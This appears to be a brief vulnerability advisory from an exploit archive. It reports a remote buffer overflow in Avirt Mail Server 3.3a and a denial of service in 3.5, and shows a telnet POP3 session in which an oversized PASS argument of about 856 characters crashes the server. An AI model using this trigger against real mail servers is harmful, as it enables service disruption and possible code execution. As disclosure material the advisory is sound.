Avirt Mail Server 3.3a or 3.5 remotely exploitable buffer overflow vulnerability
Avirt Mail Server 3.3a or 3.5 Avirt Mail Server

Avirt mail Server Remote Exploit For 3.3a or 3.5 D.o.s Binary

Avirt mail Server Remote Exploit For 3.3a or 3.5 D.o.s Source (needs Tasm 5.0)


We found a remotely exploitable buffer overflow in the Avirt Mail Server 3.3a and a D.o.S in the version 3.5, (long USER / PASS:)

that may allow an attacker to execute arbitrary code on the target server,


[cham@guilt cham]$ telnet example.com 110

Trying example.com...

Connected to example.com.

Escape character is '^]'.

+OK aVirt Mail POP3 Server Ready

user itsme


Pass [buffer]

Where [buffer] is aprox. 856 characters. At his point the server overflows and crashes.

Just a typical buffer overflow

Published by: USSRBACK

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